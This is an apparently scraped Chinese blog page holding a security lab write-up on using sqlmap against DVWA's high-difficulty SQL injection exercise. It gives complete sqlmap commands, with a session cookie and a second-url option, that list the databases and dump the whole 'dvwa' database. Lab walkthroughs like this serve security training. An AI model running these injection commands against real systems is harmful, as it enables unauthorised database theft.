减少代码量的关键在于充分利用现有资源

启动服务时报错Caused by: java.sql.SQLException: ORA-28000: the account is locked

  返回  

安全攻防综合实验 09 使用sqlmap

2021/8/20 15:20:58 浏览:

使用sqlmap自动注入dvwa sqli(high难度)

  1. burp suite抓包
     抓包可以获取的信息:http请求为POST方法;cookie;数据格式。
    http请求内容

  2. 获取库名
     用刚才得到的信息使用sqlmap,获取数据库名。命令如下:
    python2 ./sqlmap.py -u “address/dvwa/vulnerabilities/sqli/session-input.php” --data “id=1&Submit=Submit” -p “id” --cookie “security=high; PHPSESSID=9c1d29e9e4f66688ef42ce10c5f596eb” --second-url “address/dvwa/vulnerabilities/sqli/” --dbs
     -u <注入的url>
     --data <post的数据>
     -p <注入点>
     --cookie <cookie>
     --second-url <回显网址>
     --dbs 获取数据库名
    效果

  3. 下载整个数据库
    python2 ./sqlmap.py -u “address/dvwa/vulnerabilities/sqli/session-input.php” --data “id=1&Submit=Submit” -p “id” --cookie “security=high; PHPSESSID=9c1d29e9e4f66688ef42ce10c5f596eb” --second-url “address/dvwa/vulnerabilities/sqli/” -D “dvwa” --dump
     把"–dbs"改成"-D “dvwa” --dump"。
     -D <database>
     --dump 导出所有库的内容,保存为文件。文件路径会有提示的。
    效果

联系我们

如果您对我们的服务有兴趣,请及时和我们联系!

服务热线:18288888888
座机:18288888888
传真:
邮箱:888888@qq.com
地址:郑州市文化路红专路93号